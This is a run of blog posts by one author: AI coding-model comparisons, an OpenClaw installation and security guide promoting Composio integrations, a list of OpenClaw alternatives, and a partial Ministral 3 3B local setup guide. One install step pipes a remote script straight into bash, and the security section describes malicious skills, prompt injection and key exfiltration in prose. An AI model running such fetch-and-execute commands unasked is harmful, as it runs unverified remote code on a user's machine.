It did hit a failure while running tests, but it was a quick fix. After that, everything looked clean: CLI worked, offline mode worked, and overall all the feature flags seem to work perfectly.

Here’s the acceptance checklist it generated at the end, I really love it as it created this after making sure all tests pass, and everything is in place, that's how it's done.

Here's the demo of the working CLI:

Note: The API key visible in the below demo videos has been revoked. Please don’t try to use it.

...and how it integrates with Tensorlake:

You can find the code it generated here in a patch file: Opus 4.6 Patch file

Cost: ~$1.001

ℹ️ NOTE: As I'm using a Claude plan and not on API usage, this is roughly calculated based on the input/output tokens.

Duration: 20 minutes 6 seconds + ~1 min 40 sec for the fix

Output Token Usage: 33.2K + ~4K for the fix

Code Changes: 156 files changed, 95013 insertions(+)

ℹ️ You can see the complexity of the project for yourself, and you’ll probably be shocked at how good these models have gotten. It’s no longer just boilerplate or small refactors. They can build a complete, end-to-end project from scratch from a single prompt. We’re officially in the real AI era.

Claude Sonnet 4.6

Sonnet was… close, but not quite as clean as Opus.

Just like Opus, it ran into a test failure during the run. This is one of those things you’ll notice with similar models: same prompt, same codebase, and they sometimes hit the exact similar weird issue.

Here’s the demo of the CLI (you’ll see it mostly working, but there are some rough edges) and not as well implemented as Opus:

...and how it integrates with Tensorlake:

It's not working as you can see. Sonnet did attempt a fix, but still couldn't get to a working state with Tensorlake. But overall, it was super close.

You can find the code it generated here: Sonnet 4.6 Patch

Cost: ~$0.87

ℹ️ Same as Opus 4.6, this is an approximate cost based on the input/output tokens.

Duration: 33 minutes 48 seconds + ~3m 18s for the attempted fix

Output Token Usage: 52.9K + ~5K for the fix (didn't work)

Code Changes: 88 files changed, 23253 insertions(+)

🤷‍♂️ I can’t really complain about Sonnet’s performance, other than this one issue. It still got almost everything working. And to be fair, Sonnet isn’t Anthropic’s flagship coding model like Opus. It’s more of a general-purpose model, and Opus also comes with a pretty big cost difference, so the gap in code quality is kind of expected.

And please don’t try using the API keys shown in the video, as it’s already revoked.

Conclusion

Opus as a lineup is just too good. If you want an end-to-end product that works most of the time with minimal hand-holding, go with Opus. If you want something cheaper, and you’re okay finishing the last bit yourself, Sonnet is still solid.

Even in this one test, you can already see the gap in implementation quality, token usage, and time spent.

And if Anthropic can cut Opus to half its price, or even get it close to Sonnet’s, it’d be over for most other models.

For me, the best way to use these models is still the same: let them build most of it fast, then run it, test it, and clean up the rough parts yourself.

Let me know your thoughts in the comments. ✌️

How to set up Secure OpenClaw and power it with 850+ SaaS Apps 🦞🔒

Shrijal Acharya — Thu, 05 Mar 2026 13:26:54 +0000

OpenClaw has been showing up in my feed way too much, so I finally sat down and tested it properly, and yeah, it comes with a few real problems.

In this post, I’ll cover what OpenClaw is, how to set it up, where the security risks really come from, and how to use safer remote integrations so you can make it a bit more secure and save yourself some stress.

TL;DR

If you just want the takeaway, here’s the deal with OpenClaw:

OpenClaw is a local agent gateway. It is the layer that connects your LLM (OpenAI, Anthropic, etc.) to real tools and local execution.

The “special sauce” is the package. People like it because it ships as a usable bundle: built-in skills, a simple “agent brain” file (SOUL.md), and easy chat support like messenger integrations.

Security is the big problem. By design, it can touch files, run commands, and pull third-party skills. The least-bad way to use it is with remote, sandboxed integrations (which I’ve shown how to set up).

Also, watch your token bill. It can be very inefficient and chew through credits fast, especially if you’re using hosted models instead of a local LLM.

Overall, you'll learn everything you need to understand and start with OpenClaw (and make it slightly better with secure integrations).

What's OpenClaw?

OpenClaw is a personal AI assistant you run on your own machine (or a server you own). It is not a new model. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations.

Take this as a mental model:

Your LLM is the brain (thinks)
OpenClaw is the body (it can do things)
The Gateway is the receptionist (routes messages in and results out)

So when people say “OpenClaw turns an LLM into an agent,” what they really mean is: it gives the model a runtime that can call tools, keep state, and show up where you already chat (WhatsApp, Telegram, Slack, Discord, etc.).

Now, that's just the gist. There's a lot more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.

What's Special than something like Manus? 🤔

Manus is essentially "agent as a product," but you're limited to their UI, tools, rules, and cloud.

OpenClaw is more like “agent as a kit.” It’s meant to be installed, set up, and shaped around your own workflow. You decide what models it uses, what tools it can touch, what data it can access, and where it runs.

That's the biggest difference.

💁 "Manus is for convenience, and OpenClaw is for control."

Wow, that was a nice line I came up with on the fly. 😂

OpenClaw Installation

You’ve got two clean ways to install OpenClaw. If you just want it running quickly, do the normal installation. If you’re even slightly paranoid (which you should be 😮‍💨), do Docker.

The core requirement is Node ≥ 22.

Option 1: Normal install (recommended for most people)

Prereqs: Node 22+ and an API key (OpenAI, Anthropic, OpenRouter, whatever you’re using).

Install OpenClaw:

curl -fsSL https://openclaw.ai/install.sh | bash

Run onboarding (this sets up provider auth + gateway settings and can install the background service):

openclaw onboard --install-daemon

Check the gateway status (if you installed the service, it should already be running):

openclaw gateway status

Optional: Open the Control UI:

openclaw dashboard

Option 2: Docker (more isolated and secure)

Docker is great when you want a throwaway environment or isolation from your host, but it introduces an important rule:

ℹ️ Containers only see plugins and config if they share the same OpenClaw state directory/volume. So, it comes with a little complexity.

Clone and start the Docker stack:

git clone https://github.com/openclaw/openclaw
cd openclaw
./docker-setup.sh

💡 To know more about how/what it does, visit the OpenClaw Docker Quickstart

Control UI gotchas

If you open the Control UI, and it shows something like:

unauthorized: gateway token missing

That's normal. The UI needs a gateway token to connect.

Get your token:

cat ~/.openclaw/openclaw.json | jq -r '.gateway.auth.token'

Make sure jq is installed on your machine. Or, you can manually get the token from the config file ~/.openclaw/openclaw.json.

Then either:

Paste it in the UI (Overview → Gateway Access → Gateway Token)

Use a URL that includes it, for example via:

openclaw dashboard --no-open

OpenClaw is bad for Security

OpenClaw’s whole selling point is also the problem: it can read/write files, run shell commands, and load third party “skills.” That is basically “download random code from the internet and run it with your permissions,” except now an LLM is the one executing.

What’s actually gone wrong in the wild (already):

Malicious skills on ClawHub: researchers found hundreds to thousands of skills that were straight up malware or had critical issues, including credential theft and prompt injection patterns.
Prompt injection turning into installs: there’s been at least one high profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.
Exfiltrate API keys and tokens: When your agent has full control of the computer, and when compromised, it can easily exfiltrate the API keys and tokens to attackers.

If you’re still going to run it, do the bare minimum to not get cooked:

Don't trust skills you don't know. If you didn’t read it, don’t install it.
Prefer OAuth-hosted integrations over pasting keys locally.
Run it sandboxed (Docker) and keep it away from your real home directory.

If you want to read more on OpenClaw’s security posture, we have a nice piece on it: OpenClaw is a Security Nightmare Dressed Up as a Daydream

Setting up safe Integrations

So enough of that. Let's look into how you can make it a bit more secure.

I assume you already have OpenClaw installed and have already done the initial setup onboarding. We’ll use Composio plugin, which gives us access to 850+ SaaS apps like Gmail, Outlook, Canva, YouTube, Twitter and more without you needing to manage OAuth tokens and integrations.

Contrary to OpenClaw’s native integrations, the credentials do not stay in your system and neither a compromised Claw can access them. The credentials are securely hosted and managed by Composio.

1. Install Composio Plugin

Composio’s OpenClaw plugin connects OpenClaw to Composio’s MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer without you needing to handle auth hassles.

openclaw plugins install @composio/openclaw-plugin

2. Composio Plugin Setup

Log in at dashboard.composio.dev
Choose OpenClaw as the client.
Copy your consumer key (ck_...) from the Composio dashboard settings, then set it:

openclaw config set plugins.entries.composio.config.consumerKey "ck_your_key_here"

3. Verify the plugin loaded

openclaw plugins list
openclaw logs --follow

You're looking for something like "Composio loaded" and a "tools registered" message.

If the plugin is "loaded", it means that you can now successfully access Composio.

Here's how it works:

If a tool returns an auth error, the agent will prompt you to connect that toolkit at dashboard.composio.dev.

Here's how the configuration looks:

{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": {
          "consumerKey": "ck_your_key_here"
        }
      }
    }
  }
}

You can configure the following options directly from the config file:

enabled: enable or disable the plugin
consumerKey: your Composio consumer key
mcpUrl: the MCP server URL. By default, it's https://connect.composio.dev/mcp

Previously, you had to configure API keys per integration, but with Composio you don't have to care about any of that. Just make sure not to leak the consumer key that we generated.

And it's that simple. Everything works out of the box as you would use any other OpenClaw plugins!

Now, to test if it works, head over to the Control UI chat and send a message, something like:

“List the Composio tools you have available. Only print the result here”

If it asks you to connect the tools, head over to dashboard.composio.dev and connect each of the tools you require. It's as simple as clicking Connect.

All the integrations you use are OAuth hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.

Wrap Up!

OpenClaw is really useful for some people (not everyone), but it’s also risky. It can touch your files, run commands, and pull in third party skills, which can include malware, like we discussed. It’s a local agent gateway with everything: your filesystem, your shell, and whatever credentials you put into it. That power is the whole point, and it’s also the danger.

So if you’re going to use it, seriously consider OAuth-hosted safe integrations instead of pasting API keys everywhere. It’s an easy way to reduce the chance of a disaster.

And, if you're looking for some secure alternatives, find it here: Top 5 Secure OpenClaw Alternatives

That’s it for this post. Hope it helped, and I’ll see you next time. ✌️

🖐️Top 5 secure OpenClaw Alternatives you should consider 👀

Shrijal Acharya — Tue, 17 Feb 2026 12:59:41 +0000

OpenClaw is everywhere right now, and I get the hype. I’ve been seeing it all over my feed lately, and it’s clearly clicking with a lot of people. 👌

After using it for quite some time myself, it feels a bit too noisy, and not every tool works the same way for every person.

Whenever something starts trending this hard, it’s a good excuse to look around, especially if you’re after something more minimal.

And now, OpenClaw may have its 4th rename to be ClosedClaw very soon. 🤷‍♂️ You never know with OpenAI.

Why OpenClaw alternatives?

OpenClaw is super powerful, no doubt, but it comes with two big headaches, and you probably have already felt them yourself.

Security
Setup Friction
Security

When your agent can read files, run shell commands, and pull in third-party “skills,” you are basically giving it the keys to your machine. The skill marketplace has already turned into a real problem, with researchers finding hundreds of malicious skills.

If you are not auditing everything you install, it is easy to get yourself cooked.

Setup Friction

The “self-host it and wire up” path is fun if you like tinkering, but it is also where most people get stuck. You end up handling gateways, background services, tokens, and permission issues (most of the time).

And it's not that you're probably going to use all the features that come with the bloated app, just a few, for most people, so alternatives often could be a good choice.

Below are five OpenClaw alternatives that can cover the same ground, often with a smoother and more minimal experience, depending on what you’re building.

1. TrustClaw

ℹ️ Rebuilt from scratch on OpenClaw's idea with 1000+ tools, with a focus on security.

TrustClaw is for those who like the idea of OpenClaw but don't want to hand over their passwords to the agent and run it locally.

It's built by the Composio team, and the pitch is basically: you get an agent that is available 24/7, capable of taking real actions across a vast number (500+) of apps, but the risky parts like credentials and code execution are handled in a more controlled way.

What makes it different?

OAuth-only auth: You connect apps the normal way (OAuth), so you are not pasting API keys or passwords into config files.
Sandboxed execution by default: Every action runs in an isolated cloud environment that disappears when the task finishes. So you are not running “agent code” locally with your permissions.
Managed tool surface: Instead of pulling random community “skills” from a public registry, TrustClaw uses Composio’s managed integrations and tooling.
Audit trails + kill switch: It keeps a full action log, and you can revoke access with one click if you ever need to.

The last point is important because agent toolchains are a real security risk right now. These marketplaces, with just one random add-on, can trick you into running malware. This has already happened in the past. Ref: OpenClaw’s AI ‘skill’ extensions are a security nightmare

The kind of prompts it’s built for

“Handle my customer complaints and log in Notion”

It finds the right tools, fetches emails, creates drafts, and writes Notion pages (using tools such as: GMAIL_FETCH_EMAILS, GMAIL_CREATE_DRAFT, NOTION_CREATE_PAGE).
“Pull all Reddit threads mentioning [competitor] from the last 3 months, analyze sentiment...”
“Summarize all Slack messages in #product-feedback from this week...”

Why it’s comparatively better (for most of you)

Setup in seconds (vs. 30 to 60 minutes of tunnels and local setup)
Encrypted credentials managed by Composio (vs. plaintext local config)
Remote sandbox (vs. local machine execution)
Managed tool surface (vs. unvetted public skill registry)
Action logs + one-click revocation (vs. digging through config files)
and no need for Mac Mini 🤷‍♂️

Quick start

Go to TrustClaw and hit Get Started.
Connect the apps you want (OAuth flow).
Give it a task in plain language, or schedule one to run while you are offline.

Here's a demo: 👇

// Detect dark theme var iframe = document.getElementById('tweet-2022518658048888916-514'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916&theme=dark" }

It's that simple, so now you have OpenClaw that runs completely in the cloud with managed permissions and the tools you require.

2. ZeroClaw

ℹ️ Written in Rust, it runs even on $10 hardware with <5MB RAM.

ZeroClaw keeps the agent stack lean. Instead of a big local setup with lots of moving parts, you get a lightweight Rust binary that starts fast and runs comfortably on cheap hardware. If you care more about speed, stability, and low resource use, this one hits the sweet spot.

What makes it different?

Ultra lightweight: designed to keep CPU and RAM usage low.
Quick boot: fast startup, good for bots and always-on tasks.
Modular: swap models, memory, tools, and channels without rewriting everything.

Why pick it over OpenClaw?

You want something minimal and predictable.
You’re running on a small VPS / Raspberry Pi / home lab.
You don’t need a huge plugin marketplace, you need a tool that just runs.

Quick Start

git clone https://github.com/zeroclaw-labs/zeroclaw.git
cd zeroclaw
cargo build --release
cargo install --path . --force

# quick setup with openrouter
zeroclaw onboard --api-key sk-... --provider openrouter

# chat
zeroclaw agent -m "Hello, ZeroClaw!"

3. NanoClaw

ℹ️ OpenClaw's alternative that runs entirely in a container for security.

NanoClaw is basically the same thing but runs completely isolated inside a Docker container. The whole idea is simple: keep the codebase small, and put the risky stuff (bash, file access, tools) inside an isolated container so it can only touch what you explicitly mount.

That's pretty much the idea of NanoClaw.

What makes it different?

Container isolation by default: runs in Apple Container (macOS) or Docker (macOS/Linux), with filesystem isolation.
Per-chat sandboxing: each group/chat can have its own memory and its own mounted filesystem, separated from others.
Built on Anthropic’s Agents SDK: it’s basically designed to work nicely with Claude’s agent tooling and Claude Code.
WhatsApp + scheduled jobs: message it from your phone, and set recurring tasks that ping you back.

Quick start

git clone https://github.com/gavrielc/nanoclaw.git
cd nanoclaw
claude

Then run /setup. Claude Code handles everything: dependencies, authentication, container setup, and service configuration.

Here's a quick demo: 👇

4. nanobot

ℹ️ Ultra lightweight AI assistant built with Python.

Nanobot, as the name suggests, is quite small. The core agent is about ~4,000 lines of code, and the repo even publishes a live count you can verify with their script. That is the whole vibe: small enough that you can actually read it, trust it, and change it.

What makes it different?

Core size metric: ~4,000 LOC, with a “real-time” line count shown in the README (and a script to verify).
MCP support (fresh): added 2026-02-14, so it can plug into MCP tool servers without you reinventing the plumbing.
Runs where you already are: built-in “gateway” mode supports a bunch of chat surfaces like Telegram, Discord, WhatsApp, Slack, Email, and more.

Quick Start

pip install nanobot-ai

nanobot onboard
nanobot agent          # local interactive chat
nanobot gateway        # run it as a chat bot (Telegram, Discord, WhatsApp, etc)

Here's a quick architecture:

Here's a video to give you an idea of how it works: 👇

5. memU Bot

ℹ️ Built for 24/7 proactive agents designed for long-running use.

memU Bot is built for people who want an agent that keeps running and becomes more useful over time, instead of resetting to zero every time you open a new chat.

The site definitely looks like it was coded by a 12-year-old 😭, but don’t let that scare you off, because the product underneath is really good.

Under the hood, it’s tied to memU, NevaMind’s memory framework for long-running proactive agents, with a focus on reducing long-run context cost by caching insights.

What makes it different?

Always-on + proactive: it’s designed to sit in the background and capture intent (not just respond to prompts).
Memory system that scales: memU treats memory like a file system (categories, memory items, cross-links), so the agent can fetch relevant fragments instead of shoving the whole history into every request.

Quick start

It's a bit more involved than other options.

If you just want the product (memU Bot):

Go to memu.bot, enter your email, and get the download link they send you.
Install it like a normal desktop app (they provide a macOS .dmg in the tutorial flow).
Start it, connect the channel you want (Telegram, etc.), and let it run so it can build memory over time.

git clone https://github.com/NevaMind-AI/memU.git
cd memU

# Requires Python 3.13+
pip install -e .

# set your key (OpenAI is the default in their quick tests)
export OPENAI_API_KEY="your_api_key"

# quick test using in-memory storage
cd tests
python test_inmemory.py

Want persistent memory backed by Postgres + pgvector?

docker run -d \
  --name memu-postgres \
  -e POSTGRES_USER=postgres \
  -e POSTGRES_PASSWORD=postgres \
  -e POSTGRES_DB=memu \
  -p 5432:5432 \
  pgvector/pgvector:pg16

export OPENAI_API_KEY="your_api_key"
cd tests
python test_postgres.py

They also provide a small runnable "proactive loop" example if you want to see the behavior without going through tests:

cd examples/proactive
python proactive.py

There's also a Cloud version which you can try out as well.

It might be worth checking this out: 👇

If you know of any other useful OpenClaw alternative tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻

That concludes this article. Thank you so much for reading! 🫡

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🔥 Claude Opus 4.5 vs GPT 5.2 High vs Gemini 3 Pro: Production Coding Test ✅

Shrijal Acharya — Sun, 18 Jan 2026 12:41:12 +0000

Okay, so right now the WebDev leaderboard on LMArena is basically owned by the big three: Claude Opus 4.5 from Anthropic, GPT-5.2-codex (high) from OpenAI, and finally everybody's favorite, Gemini 3 Pro from Google.

So, I grabbed these three and put them into the same existing project (over 8K stars and 50K+ LOC) and asked them to build a couple of real features like a normal dev would.

Same repo. Same prompts. Same constraints.

For each task, I took the best result out of three runs per model to keep things fair.

Then I compared what they actually did: code quality, how much hand-holding they needed, and whether the feature even worked in the end.

⚠️ NOTE: Don't take the result of this test as a hard rule. This is just a small set of real-world coding tasks that shows how each model did for me in that exact setup and gives you an overview of the difference in the top 3 models' performance in the same tasks.

TL;DR

If you want a quick take, here’s how the three models performed in our tests:

Claude Opus 4.5 was the most consistent overall. It shipped working results for both tasks, and the UI polish was the best of the three. The main downside is cost. If they find a way to achieve this performance while reducing cost, it will actually be over for most other models.

GPT-5.2-codex (high) was one of the best. But it's obviously slower due to the higher reasoning. When it hit, the code quality and structure were great, but it needed more patience than the other two in this repo.

Gemini 3 Pro was the most efficient. Both tasks worked, but the output often felt like the minimum viable version, especially on the analytics dashboard.

💡 If you want the safest pick for real “ship a feature in a big repo” work, Opus 4.5 felt the most reliable in my runs. If you care about speed and cost and you’re okay polishing UI yourself, Gemini 3 Pro is a solid bet.

Test Workflow

For the test, we will use the following CLI coding agents:

Claude Opus 4.5: Claude Code (Anthropic’s terminal-based agentic coding tool)
Gemini 3 Pro: Gemini CLI
GPT-5.2 High: Codex CLI

Here’s the repo used for the entire test: iib0011/omni-tools

We will check the models on two different tasks:

Task 1: Add a global Action Palette (Ctrl + K)

Each model is asked to create a global action menu that opens with a keyboard shortcut. This feature expands on the current search by adding actions, global state, and keyboard navigation. This task checks how well the model understands current UX patterns and avoids repetition without breaking what's already in place.

Task 2: Tool Usage Analytics + Insights Dashboard

Each model had to add real usage tracking across the app, persist it locally, and then build an analytics dashboard that shows things like the most used tools, recent activity, and basic filters.

We’ll compare code quality, token usage, cost, and time to complete the build.

💡 NOTE: I will share the source code changes for each task by each model in a .patch file. This way, you can easily view them on your local system by cloning the repository and applying the patch file using git apply <path_file_name>. This method makes sharing changes easier.

Real-world Coding Tests

Test 1: Add a global Action Palette (Ctrl + K)

The task is simple: all models start from the same base commit and then follow the same prompt to build what is asked in the prompt.

And obviously, as mentioned, I will evaluate the response from the model from the "Best of 3."

Let's start off the test with something interesting:

Here's the prompt used:

This project already has a search input on the home page that lets users find tools. I want to add an improved, global version of this idea that works as an **Action Palette**, similar to what you see in editors like VS Code.

**What to build**

* Pressing **Ctrl + K** (or Cmd + K on macOS) should open a centered action palette overlay from anywhere in the app.
* The palette should support:
  * Searching and navigating to tools (reuse existing tool metadata)
  * Executing actions, such as:

    * Toggle dark mode
    * Switch language
    * Toggle user type filter (General / Developer)
    * Navigate to Home and Bookmarks
    * Clear recently used tools

* Fully keyboard-driven experience:

  * Type to filter
  * Arrow keys to navigate
  * Enter to execute
  * Escape to close

**Notes**

* This should not replace the existing home page search. Think of it as a more powerful, global version that combines navigation and actions.
* The implementation should follow existing patterns, styling, and state management used in the codebase.

GPT-5.2-Codex (high)

GPT-5.2 handled this surprisingly well. The implementation was solid end to end, and it basically one-shotted the entire feature set, including i18n support, without needing multiple correction passes.

That said, it did take a bit longer than some other models (~20 minutes), which is expected since reasoning was explicitly set to high. You can clearly see the model spending more time thinking through architecture, naming, and edge cases rather than rushing to output code. The trade-off felt worth it here.

The token usage was noticeably higher due to the reasoning set to high, but the output code reflected that.

Here's the demo:

You can find the code it generated here: GPT-5.2 High Code

Cost: ~$0.9-1.0
Duration: ~20 minutes (API time)
Code Changes: +540 lines, minimal removals
Token Usage:
- Total: ~203k
- Input: ~140k (+ cached context)
- Output: ~64k
- Reasoning tokens: ~47k

💡 NOTE: I ran the exact same prompt with the same model using the default (medium) reasoning level. The difference was honestly massive. With reasoning set to high, the quality of the code, structure, and pretty much everything jumps by miles. It’s not even a fair comparison.

Claude Opus 4.5

Claude went all in and prepared a ton of different strategies. At the start, it did run into build issues, but it kept running the build until it was able to fix all the build and lint issues.

The entire run took me about 7 minutes 50 seconds, which is the fastest among the models for this test. The features all worked as asked, and obviously, the UI looked super nice and exactly how I expected.

Here's the demo:

You can find the code it generated here: Claude Opus 4.5 Code

To be honest, this exceeded my expectations; even the i18n texts are added and displayed in the UI just as expected. Absolute cinema!

Cost: $0.94
Duration: 7 min 50 sec (API Time)
Code Changes: +540 lines, -9 lines

Gemini 3 Pro

Gemini 3 got it working, but it's clearly not on the same level as GPT-5.2 High or Claude Opus 4.5. The UI it built is fine and totally usable, but it feels a bit barebones, and you don't get many choices in the palette compared to the other two.

One clear miss is that language switching does not show up inside the action palette at all, which makes the i18n support feel incomplete even though translations technically exist.

Here's the demo:

You can find the code it generated here: Gemini 3 Pro Code

Cost: Low (helped significantly by cache reads)
Duration: ~10 minutes 49 seconds (API Time)
Code Changes: +428 lines, -65 lines
Token Usage:
- Input: ~79k
- Cache Reads: ~536k
- Output: ~10.7k
- Savings: ~87% of input tokens served from cache

Overall, Gemini 3 lands in a very clear third place here. It works, the UI looks fine, and nothing is completely broken, but compared to the depth, completeness, and polish of GPT-5.2 High and Claude Opus 4.5, it feels behind.

Test 2: Tool Usage Analytics + Insights Dashboard

This test is a step up from the action palette.

You can find the prompt I've used here: Prompt

GPT-5.2-Codex (high)

GPT-5.2 absolutely nailed this one.

The final result turned out amazing. Tool usage tracking works exactly as expected, data persists correctly, and the dashboard feels like a real product feature. Most used tools, recent usage, filters, everything just works.

One really nice touch is that it also wired analytics-related actions into the Action Palette from Test 1.

It did take a bit longer than the first test, around 26 minutes, but again, that’s the trade-off with high reasoning. You can tell the model spent time thinking through data modeling, reuse, and avoiding duplicated logic. Totally worth it here.

Here’s the demo:

You can find the code it generated here: GPT-5.2 High Code

Cost: ~$1.1–1.2
Duration: ~26 minutes (API time)
Code Changes: Large multi-file update, cleanly structured
Token Usage:
- Total: ~236k
- Input: ~162k (+ heavy cached context)
- Output: ~75k
- Reasoning tokens: ~57k

GPT-5.2 High continues to be slow but extremely powerful, and for a task like this, that’s a very good trade.

Claude Opus 4.5

Claude Opus 4.5 did great here as well.

The final implementation works end to end, and honestly, from a pure UI and feature standpoint, it’s hard to tell the difference between this and GPT-5.2 High. The dashboard looks clean, the data makes sense, and the filters work as expected.

Here’s the demo:

You can find the code it generated here: Claude Opus 4.5 Code

Cost: $1.78
Duration: ~8 minutes (API Time)
Code Changes: +1,279 lines, -17 lines

Gemini 3 Pro

Gemini 3 Pro gets the job done, but it clearly takes a more minimal approach compared to GPT-5.2 High and Claude Opus 4.5.

That said, the overall experience feels very bare minimum. The UI is functional but plain, and the dashboard lacks the polish and depth you get from the other two models.

Also, it didn't quite add the button to view the analytics right in the action palette, similar to the other two models.

Here’s the demo:

You can find the code it generated here: Gemini 3 Pro Code

Cost: Low, with heavy cache utilization
Duration: ~5 minutes (API Time)
Code Changes: +351 lines, -3 lines
Token Usage:
- Input: ~67k
- Output: ~7.1k
- Savings: ~85%+ input tokens served from cache

Overall, Gemini 3 Pro remains efficient and reliable, but in a comparison like this, efficiency alone is not enough. 🤷‍♂️

Conclusion

At least from this test, I can conclude that the models are now pretty much able to one-shot a decent complex work, at least from what I tested.

Still, there have been times when the models mess up so badly that if I were to go ahead and fix the problems one by one, it would take me nearly the same time as building it from scratch.

If I compare the results across models, Opus 4.5 definitely takes the crown. But I still don’t think we’re anywhere close to relying on it for real, big production projects. The recent improvements are honestly insane, but the results still don’t fully back them up.

For now, I think these models are great for refactoring, planning, and helping you move faster. But if you solely rely on their generated code, the codebase just won’t hold up long term.

I don't see any of these recent models as “use it and ship it” for "production," in a project with millions of lines of code, at least not in the way people hype it up.

Let me know your thoughts in the comments.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Ministral 3 3B Local Setup Guide with MCP Tool Calling 🔥

Shrijal Acharya — Wed, 24 Dec 2025 16:26:00 +0000

Everyone’s talking about Ministral 3 3B, so I wanted to see what the hype is about. 🤨

Let's test it properly. We’ll start with the fun part and run it directly in the browser using WebGPU, fully local.

Then we’ll switch to the practical setup and run a quantized version with Ollama, plug it into Open WebUI, and test real tool calling. First with small local Python tools, then with remote MCP tools via Composio.

We will cover a few specs and then move on to practical tests, so let's jump in.

What’s Covered?

In this hands-on guide, you’ll learn about the Ministral 3 3B model, how to run it locally, and how to get it to perform real tool calls using Open WebUI, first with local tools and then with remote MCP tools via Composio.

What you will learn: ✨

What makes Ministral 3 3B special
How to run the model locally using Ollama (including pulling a quantized variant)
How to launch Open WebUI using Docker and connect it to Ollama
How to add and test local Python tools inside Open WebUI
How to work with remotely hosted MCP tools in Open WebUI

⚠️ NOTE: This isn’t a benchmark post. The idea is to show a practical setup for running a small local model with real tools, then extending it with remote MCP servers.

What's so Special?

Ministral 3 3B is the smallest and most efficient model in the Ministral 3 family. Mistral 3 includes three state-of-the-art small dense models: 14B, 8B, and 3B, along with Mistral Large 3, which is the most capable model to date from Mistral. All models in this family are open source under the Apache 2.0 license, which means you can fine-tune and use them commercially for free.

But the topic of our talk is the Ministral 3 3B model. At such a small size, it comes with function calling, structured output, vision capabilities, and most importantly, it is one of the first multimodal models capable of running completely locally in the browser with WebGPU support.

As Mistral puts it, this model is both compact and powerful. It is specially designed for edge deployment, offering insanely high speed and the ability to run completely locally even on fairly old or low-end hardware.

Here is the model’s token context window and pricing.

Token Context Window: It comes with a 256K token context window, which is impressive for a model of this size. For reference, the recent Claude Opus 4.5 model, which is built specifically for agentic coding, comes with a 200K token context window.

Pricing: Because it is open source, you can access it for free by running it locally. If you use it through the Mistral playground, pricing starts at $0.1 per million input tokens and $0.1 per million output tokens, which is almost negligible. It honestly feels like the pricing is there just for formality.

Besides its decent context window and fully open-source nature, these are the major features of Ministral 3 3B.

Vision: Enables the model to analyze images and provide insights based on visual content, in addition to text.

Multilingual: Supports dozens of languages, including English, French, Spanish, German, and more.

Agentic: Offers strong agentic capabilities with native function calling and JSON output, which we will cover shortly.

Local: Runs completely locally in your browser with WebGPU support.

Here is a small demo of the model running directly in the browser:

To actually get a feel for running a model locally in the browser, head over to this Hugging Face Space: mistralai/Ministral_3B_WebGPU

💡 NOTE: For most users, this will work out of the box, but some may encounter an error if WebGPU is not enabled or supported in their browser. Make sure WebGPU is enabled based on the browser you are using.

When you load it, the model files, roughly 3GB, are downloaded into your browser cache, and the model runs 100 percent locally with WebGPU acceleration. It is powered by Transformers.js, and all prompts are handled directly in the browser. No remote requests are made. Everything happens locally.

How cool is that? You can run a capable multimodal model entirely inside your browser, with no server involved.

Running Ministral 3 3B Locally

In the above example, you see how the model does such an amazing job with vision capabilities (live video classification). Now let's see how good this model is at making tool calls. We will test it by running the model locally on our system.

For this, there are generally two recommended approaches:

vLLM: Easy, fast, and cheap LLM serving for everyone.
Good old Ollama: Chat & build with open models.

You can go with either option, and generally speaking, the vLLM approach is a lot easier to get started with, and that's what I'd suggest, but...

I kept hitting a CUDA out-of-memory error, so I went with Ollama with the quantized model. I have had a great experience with Ollama so far. The model will be good enough for our use case demo.

Step 1: Install Ollama and Docker

If you don't have Ollama installed already, install it on your system by following the documentation here: Ollama Installation Guide.

It's not compulsory, but we will use the OpenWebUI through the Docker container, so if you plan to follow along, make sure you have Docker installed.

You can find the Docker installation guide here: Docker Installation.

Step 2: Download Ministral 3 3B Model and Start Ollama

Now that you have Ollama installed and Docker running, let's download the Ministral 3 3B model and start Ollama.

ollama pull ministral-3:3b

⚠️ CAUTION: If you don't have sufficient VRAM (Virtual RAM) and decent specs on your system, your system might catch fire when running the model. 🫠

If so, go with the quantized model instead as I did.

ollama pull ministral-3:3b-instruct-2512-q4_K_M

Now, start the Ollama server with the following command:

ollama serve

Once the model is downloaded and the server is running, you can quickly test it in the terminal itself.

ollama run ministral-3:3b-instruct-2512-q4_K_M "Which came first, the chicken or the egg?"

If you get a response, you are good to go.

Step 3: Run Ollama WebUI

To just talk with the model, the CLI chat with ollama run works perfectly, but we need to add some custom tools to our model.

For that, the easiest way is through the Ollama WebUI.

Download and run the Ollama WebUI with the following command:

docker run -d --network=host \
            -e OLLAMA_BASE_URL=http://127.0.0.1:11434 \
            -v open-webui:/app/backend/data \
            --name open-webui --restart always \
            ghcr.io/open-webui/open-webui:main

That command starts Open WebUI in Docker and sets it up to talk with the local Ollama server we just started with the ollama serve command.

docker run -d runs the container in the background (detached).
-network=host puts the container on the host network, so it can reach services on your machine using 127.0.0.1 (localhost).
e OLLAMA_BASE_URL=http://127.0.0.1:11434 tells Open WebUI where your Ollama server is.
v open-webui:/app/backend/data creates a persistent Docker volume so your Open WebUI chat history persists.
-name open-webui names the container.
-restart always makes it auto-start again after reboots or crashes.
ghcr.io/open-webui/open-webui:main is the image being run (the main tag).

To see if it all worked well, run this command:

docker ps

If you see a container with the name open-webui and the status Up, you are good to go, and you can now safely visit: http://localhost:8080 to view the WebUI.

Step 4: Add Custom Tools for Function Calling

Once you're in, you should see the new model ministral-3:3b-instruct-2512 in the list of models. Now, let's add our custom tools.

First, let's test it with local tools, which are smaller Python functions that the model can call.

Head over to the Workspace tab in the left sidebar, and in the Tools section, click on the "+ New Tool" button, and paste the following code: Local Tools

Now, in a new chat, try saying something like:

"What's 6 + 7?"

The model should use our added tool to answer the question.

